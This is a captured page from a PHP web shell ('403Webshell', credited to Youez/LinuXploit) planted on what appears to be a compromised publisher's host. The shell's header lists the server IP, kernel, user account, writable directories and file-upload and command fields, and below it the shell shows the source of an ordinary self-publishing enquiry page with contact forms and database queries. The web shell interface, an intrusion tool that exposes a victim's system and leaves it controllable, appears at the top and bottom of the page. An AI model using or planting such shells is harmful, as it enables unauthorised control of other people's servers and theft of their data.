403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/www/publish-my-book.php
<?php
require_once('header.php');
echo '<div class="row head main"><div class="col s12 m12 l12 center-align"><h1>'.$pagetitle.'</h1></div></div>';
?>

<?php
$countries = '';
$stmt = $mysqli->prepare("SELECT nicename, phonecode FROM country WHERE phonecode != '0' ORDER BY nicename");
$stmt->execute();
$stmt->store_result();
$stmt->bind_result($nicename, $phonecode);
while($stmt->fetch()):
	$countries .= '<option value="' . $phonecode . '" ' . ($phonecode == '91' ? 'selected' : '') . '>' . $nicename . '</option>';
endwhile;
$stmt->close();
?>

<br clear="all">

<div class="center-align">
	<h2 style="font-size: 20px;color: #2668b1;">Establish a lasting legacy by publishing your book with AkiNik Publications!</h2>
</div>

<br clear="all"><br clear="all">

<div class="card card-primary">
	<div class="card-content">
		<p>Ready to bring your book to life? At AkiNik Publications, we support authors of all experience levels, offering professional and personalized services to seamlessly transform your manuscript into a published work. From expert editing and proofreading to customizable publishing packages for digital, print, or both, we ensure your book is polished and professionally prepared. Once ready, we distribute your book globally through major platforms like our official website, Amazon  and GeM. Starting is simple—submit your manuscript, and our team will review it, provide feedback, and guide you through every step, from editing and design to printing and promotion. Let’s turn your ideas into a published success. No matter If you have some queries like how can I publish my book, where can I publish my book or when can I publish my book—get in touch with us today!</p>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="bookpublicationbuttons">
	<a href="<?php echo $baseurl; ?>docs/AuthorGuidelines.pdf" class="waves-effect btn-flat blue accent-3 white-text" target="_blank">Download Author Guidelines</a>
	<a href="<?php echo $baseurl; ?>publishbookchapter" class="waves-effect btn-flat blue accent-3 white-text">Publish Book Chapter</a>
	<a href="tel:1800-1234-070" class="waves-effect btn-flat blue accent-3 white-text">Toll Free: 1800-1234-070</a>
</div>

<br clear="all"><br clear="all">

<div class="row">
	<div class="col s12 m12 l6" style="display:flex;justify-content:center;align-items:center;">
		<img src="https://www.akinik.com/images/self-publishing-a-book-enquiry.jpg" alt="Book Publication" title="Book Publication">
	</div>
	<div class="col s12 m12 l6">
		<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
			<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
			<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH]'); ?>" autocomplete="off" readonly />
			<input type="hidden" name="zipcode" value="" readonly />
			<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
			<div class="card card-primary">
				<div class="card-content">
					<div class="card-form">
						<div class="card-title center-align" style="font-weight: 500;">Get in Touch!</div>
						<div class="row">
							<div class="col s12 m6 l6">
								<label for="name">name</label>
								<input type="text" name="name" id="name" class="form-control" />
							</div>
							<div class="col s12 m6 l6">
								<label for="email">email</label>
								<input type="text" name="email" id="email" class="form-control" />
							</div>
						</div>
						<div class="row">
							<div class="col s12 m6 l6">
								<label for="country">country</label>
								<select name="country" id="country" class="browser-default form-control">
									<option value="" selected="selected">Select country</option>
									<?php echo $countries; ?>
								</select>
							</div>
							<div class="col s12 m6 l6">
								<label for="phone">WhatsApp Number</label>
								<input type="text" name="phone" id="phone" class="form-control" />
							</div>
						</div>
						<div class="row">
							<div class="col s12 m12 l12">
								<label for="message">message</label>
								<textarea rows="5" cols="5" name="message" id="message" class="form-control" style="height: 100px !important;"></textarea>
							</div>
						</div>
						<div class="row">
							<div class="col s12 m12 l12">
								<label for="skycolor">What is color of sky in day? (Anti Spam Question)</label>
								<select name="skycolor" class="browser-default form-control">
									<option value="" selected>Select sky color</option>
									<option value="blue">Blue</option>
									<option value="black">Black</option>
									<option value="green">Green</option>
									<option value="orange">Orange</option>
								</select>
							</div>
						</div>
					</div>
				</div>
				<div class="card-action">
					<button style="width: 100%;" type="submit" name="submit" class="waves-effect btn-flat blue accent-3 white-text" disabled>submit</button>
				</div>
			</div>
		</form>
	</div>
</div>

<br clear="all"><br clear="all">

<div class="center-align">
	<h2 style="font-size: 24px;color: #2668b1;font-weight: bold;">Publish Book Step-By-Step</h2>
</div>

<br clear="all"><br clear="all">

<div class="bookservices">
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Plan Book Proposal</div>
				<div class="card-text">To publish my book, when you are preparing your book proposal, provide a clear summary of your book's concept and its relevance to the target audience. Include a chapter outline with brief descriptions and highlight how your book stands out in the market. Attach an author bio showcasing your expertise and sample chapters to give a sense of your writing style.</div>
			</div>
		</div>
	</div>
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Create Manuscripts</div>
				<div class="card-text">To publish my book, write consistently to maintain progress and focus on completing your work. Revise and edit thoroughly, ensuring clarity and flow, and seek feedback from trusted readers or a professional editor. Once you're satisfied, give the manuscript a final polish and make sure it's properly formatted before submitting it for publishing.</div>
			</div>
		</div>
	</div>
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Proof Reading</div>
				<div class="card-text">Proofreading involves carefully reviewing your text to identify and correct errors in grammar, punctuation, spelling, and formatting. It focuses on ensuring clarity, consistency, and accuracy, while also checking for proper sentence structure and word usage. A thorough proofread helps improve the overall readability of your work and ensures it is polished and error-free before final submission.</div>
			</div>
		</div>
	</div>
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Submit Your Book</div>
				<div class="card-text">Submitting your book involves preparing your manuscript according to the publisher's guidelines, ensuring it is formatted correctly and accompanied by any required documents such as a cover letter, author bio, and book proposal. Once everything is ready, send your manuscript to the publisher through their preferred submission method, whether it's via email, an online portal, or physical mail. Be sure to keep track of your submission and follow up as needed.</div>
			</div>
		</div>
	</div>
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Publication</div>
				<div class="card-text">For Publish my book, the Publication is the final stage where your manuscript is transformed into a finished book, ready for readers. The publisher handles the production process, which includes editing, design, formatting, and printing, as well as securing an ISBN and distribution channels. Once published, your book is made available in digital and/or physical formats through various platforms and stores, allowing it to reach its intended audience.</div>
			</div>
		</div>
	</div>
	<div class="colbookservices">
		<div class="card">
			<div class="card-content">
				<div class="card-title">Market</div>
				<div class="card-text">Marketing your book involves promoting it to your target audience through various strategies to boost visibility and sales. This can include online campaigns, social media promotion, book reviews, author interviews, and collaborations with influencers or book bloggers. The goal is to create awareness, build interest, and engage with potential readers to maximize your book's reach and impact. Effective marketing helps generate buzz and sustain long-term interest in your work.</div>
			</div>
		</div>
	</div>
</div>

<br clear="both"><br clear="both">

<div class="inlineform">
	<h2 class="inlineformtitle">Are you Ready to submit your book</h2>

	<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
		<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
		<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH_INLINE]'); ?>" autocomplete="off" readonly />
		<input type="hidden" name="zipcode" value="" readonly />
		<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
		<div class="flexible">
			<div class="input-group">
				<input type="text" name="name" id="name" class="form-control" placeholder="Full name" />
			</div>
			<div class="input-group">
				<input type="text" name="email" id="email" class="form-control" placeholder="Email address" />
			</div>
			<div class="input-group">
				<select name="country" class="browser-default">
					<option value="" selected="selected">Select country</option>
					<?php echo $countries; ?>
				</select>
			</div>
			<div class="input-group">
				<input type="text" name="phone" id="phone" class="form-control" placeholder="WhatsApp number" />
			</div>
			<div class="input-group">
				<input type="text" name="message" id="message" class="form-control" placeholder="Message" />
			</div>
		</div>
		<div class="flexible" style="margin-top: 15px;">
			<button type="submit" name="submit" class="waves-effect btn-flat black white-text" disabled>submit</button>
		</div>
	</form>
</div>

<br clear="all"><br clear="all">

<div class="center-align">
	<h2 style="font-size: 20px;color: #2668b1;">More than 1500+ Published Books</h2>
</div>

<br clear="all"><br clear="all">

<div class="center-align">
	<h5>With over 1500+ published books, AkiNik Publications has established itself as a trusted and prolific publisher across various genres and academic fields.</h5>
</div>

<br clear="all"><br clear="all">

<div class="card styledbooks">
	<div class="card-content">
        <div class="owl-carousel">
            <?php
            $stmt = $mysqli->prepare("SELECT title, volume, image FROM products WHERE (category = 'Book' AND status = 'enabled') ORDER BY productid DESC LIMIT 12") or die('An error occurred. Please try after some time.');
			$stmt->execute();
			$stmt->store_result();
			if($stmt->num_rows() > 0):
				$stmt->bind_result($title, $volume, $image);
				while($stmt->fetch()):
					$volume = $volume ? ' (Volume - ' . $volume . ')' : '';
	
					echo '<div class="item"><img src="' . $imageurl . $image . '" alt="' . $title . $volume . '" title="' . $title . $volume . '" /></div>';
				endwhile;
			endif;
			$stmt->close();
            ?>
        </div>
	</div>
</div>

<br clear="both"><br clear="both">

<div class="inlineform">
	<h2 class="inlineformtitle">Are you Ready to submit your book</h2>

	<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
		<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
		<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH_INLINE]'); ?>" autocomplete="off" readonly />
		<input type="hidden" name="zipcode" value="" readonly />
		<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
		<div class="flexible">
			<div class="input-group">
				<input type="text" name="name" id="name" class="form-control" placeholder="Full name" />
			</div>
			<div class="input-group">
				<input type="text" name="email" id="email" class="form-control" placeholder="Email address" />
			</div>
			<div class="input-group">
				<select name="country" class="browser-default">
					<option value="" selected="selected">Select country</option>
					<?php echo $countries; ?>
				</select>
			</div>
			<div class="input-group">
				<input type="text" name="phone" id="phone" class="form-control" placeholder="WhatsApp number" />
			</div>
			<div class="input-group">
				<input type="text" name="message" id="message" class="form-control" placeholder="Message" />
			</div>
		</div>
		<div class="flexible" style="margin-top: 15px;">
			<button type="submit" name="submit" class="waves-effect btn-flat black white-text" disabled>submit</button>
		</div>
	</form>
</div>

<br clear="all"><br clear="all">

<div style="text-align:center;text-decoration:underline;">
	<h3 style="font-size:36px;">Frequently Asked Questions?</h3>
</div>

<br clear="all"><br clear="all">

<div class="ab_accordion">
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>1. What types of books does AkiNik Publications publish?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">AkiNik Publications publishes a wide range of genres, including academic works, fiction, non-fiction, and research-based publications. We cater to authors from various fields and backgrounds.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>2. How do I submit my manuscript to AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">You can submit your manuscript by following our submission guidelines. Simply prepare your manuscript, along with a cover letter, author bio, and any other required documents, and submit them through our online portal or via email. Submission guidelines: <a href="">https://www.akinik.com/docs/AuthorGuidelines.pdf</a></div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>3. Do you provide editing services?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Yes, we offer professional editing services as part of our publishing process. Our editors will work with you to ensure that your manuscript is polished and ready for publication.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>4. How long does the publishing process take?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">The timeline varies depending on the length and complexity of your manuscript, as well as the level of editing and design required. On average, the publishing process can take 15 days from acceptance to final publication.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>5. Will I have control over the design of my book cover?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Yes, you will collaborate with our design team to create a custom cover that reflects your vision. While we provide expert guidance, you have creative input in the design process.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>6. How will my book be distributed?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Your book will be distributed through various channels, including major online platforms such as Amazon, AkiNik publications Website, Government e-marketplace (GeM), and academic institutions.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>7. What royalties will I earn from my book sales?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Authors receive royalties based on the sales of their books per year. The percentage of royalties depends on the terms agreed upon in the publishing contract, which varies between print and digital formats.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>8. Does AkiNik Publications offer marketing services?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Yes, we provide marketing support to help promote your book. This includes social media promotion, online campaigns, book reviews, and collaborations with influencers to reach a wider audience.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>9. Can I publish both digital and print versions of my book?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">Absolutely! AkiNik Publications offers both digital (e-book) and print publishing options. You can choose either or both formats to ensure your book reaches your desired audience.</div>
	</div>
	<div class="ab_accordion_section">
		<div class="ab_accordion_header"><span>10. How do I get started with AkiNik Publications?</span> <span class="material-icons">arrow_drop_down</span></div>
		<div class="ab_accordion_content">To get started, submit your manuscript and book proposal to us for review. From there, we will guide you through the entire publishing process, from editing to distribution and marketing.</div>
	</div>
</div>

<style>
#toast-container{min-width: 10%;top: 50%;right: 50%;transform: translateX(50%) translateY(50%);}
@media (max-width:768px) {
	#toast-container{width: 100%;}
}
</style>

<script id="recaptchaapiurl" src="https://www.google.com/recaptcha/api.js?render=6LdSR1gpAAAAANGL6NHCNF33osMAjWSBZFEQeDYs" defer></script>
<script defer>
	window.addEventListener('load', function () {
		grecaptcha.ready(function () {
			grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
				document.querySelectorAll('.recaptchaResponse').forEach(e => {
					e.value = token;
				})
			});
		});
	})
	function pageform(f) {
		if (document.querySelector('.toast')) {
			document.querySelector('.toast').remove();
		}
		f.submit.disabled = true;
		fetch(f.action, {method: 'post',mode: 'same-origin',cache: 'no-cache',headers: {'Accept': 'application/json'},body: new FormData(f)}).then(response => response.json()).then(r => {
			if(r.s === false) {
				M.toast({html: r.t, classes: 'red'})
			}
			if(r.s === true) {
				M.toast({html: r.t, classes: 'green'});f.reset();
			}
		}).catch(error => {alert(error)}).finally(() => {
			f.submit.disabled = false;
			grecaptcha.ready(function () {
				grecaptcha.execute((new URL(recaptchaapiurl.src)).searchParams.get('render'), { action: 'contact' }).then(function (token) {
					document.querySelectorAll('.recaptchaResponse').forEach(e => {
						e.value = token;
					})
				});
			});
		});
		return false;
	}
</script>

<?php
require_once('footer.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit